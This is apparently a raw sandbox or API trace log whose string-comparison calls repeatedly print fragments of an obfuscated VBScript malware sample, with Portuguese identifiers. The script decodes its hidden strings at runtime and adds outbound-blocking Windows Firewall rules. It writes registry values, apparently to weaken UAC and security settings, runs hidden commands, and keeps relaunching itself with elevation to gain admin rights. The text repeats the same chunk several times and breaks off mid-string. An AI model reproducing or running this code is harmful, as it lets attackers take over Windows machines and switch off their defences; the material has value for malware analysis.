bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.301] wcsncmp (_String1="(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.301] wcsncmp (_String1="s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.301] wcsncmp (_String1="1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.301] wcsncmp (_String1=")-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 